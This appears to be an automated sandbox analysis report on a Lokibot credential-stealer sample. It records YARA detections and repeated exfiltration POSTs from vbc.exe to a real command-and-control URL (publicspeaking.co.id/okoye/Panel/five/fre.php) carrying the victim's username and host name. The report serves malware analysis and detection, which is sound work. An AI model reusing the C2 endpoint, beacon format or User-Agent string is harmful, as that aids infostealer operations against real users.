                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:02.599735975 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  58192.168.2.55000292.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:02.864523888 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:02.984416008 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:04.589252949 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:04 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 7ad045ee1fb033c3857b7dd1a1c0f992-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.379
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:04.589303970 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  59192.168.2.55000892.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:04.863217115 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:04.984505892 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:06.546581030 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:06 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 7d378eb3e0b9e29d583d8d249eb9f5e5-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:06.546654940 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  60192.168.2.55001492.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:07.100033045 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:07.223056078 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:08.782496929 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:08 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: fdefbfa7ee96c85e7b960b102ec68fc0-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:08.782629967 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  61192.168.2.55002092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:09.269464016 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:09.389082909 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:10.859057903 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:10 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 34a6aba8dc5acf3e01b68c58cb03f082-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:10.859142065 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  62192.168.2.55002692.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:11.137404919 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:11.258701086 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:12.816879034 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:12 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 8476218cc9bff571692ff35ab9093be8-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.336
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:12.816898108 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:08:12:03
                                  Start date:22/12/2024
                                  Path:C:\Users\user\Desktop\Hh8hqqbu9X.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Hh8hqqbu9X.exe"
                                  Imagebase:0xf70000
                                  File size:577'536 bytes
                                  MD5 hash:F4C0448C427E926B0D3C0D1FBC1A866E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:08:12:04
                                  Start date:22/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
                                  Imagebase:0x400000
                                  File size:1'173'928 bytes
                                  MD5 hash:D881DE17AA8F2E2C08CBB7B265F928F9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:moderate
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:15.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:1.6%
                                    Total number of Nodes:812
                                    Total number of Limit Nodes:56
                                    execution_graph 35938 5907590 35939 59075b3 35938->35939 35940 59077b0 35939->35940 35943 5908118 35939->35943 35947 5908128 35939->35947 35944 5908128 35943->35944 35945 59083a4 35944->35945 35952 59087c9 35944->35952 35945->35940 35948 59083a4 35947->35948 35949 5908150 35947->35949 35948->35940 35950 590852a 35949->35950 35951 59087c9 PeekMessageW 35949->35951 35950->35940 35951->35948 35953 5908803 35952->35953 35954 5908882 35953->35954 35957 5908bd0 35953->35957 35962 5908be0 35953->35962 35954->35945 35958 5908baf 35957->35958 35959 5908bda 35957->35959 35958->35954 35961 5908cb3 35959->35961 35966 59003c0 35959->35966 35961->35954 35963 5908c3a 35962->35963 35965 5908cb3 35962->35965 35964 59003c0 PeekMessageW 35963->35964 35963->35965 35964->35965 35965->35954 35967 59025e8 PeekMessageW 35966->35967 35968 590265f 35967->35968 35968->35961 35969 5908650 35970 590867c CloseHandle 35969->35970 35971 590865e 35969->35971 35975 59086ff 35970->35975 35976 5907358 CloseHandle 35971->35976 35974 5908678 35976->35974 36182 5909430 36183 5909444 36182->36183 36187 5909588 36183->36187 36190 590957b 36183->36190 36184 5909516 36195 59095d3 36187->36195 36188 5909596 36188->36184 36191 5909582 36190->36191 36192 590955d 36190->36192 36194 59095d3 2 API calls 36191->36194 36192->36184 36193 5909596 36193->36184 36194->36193 36196 5909602 36195->36196 36197 5909657 36196->36197 36200 5909730 36196->36200 36204 5909740 36196->36204 36197->36188 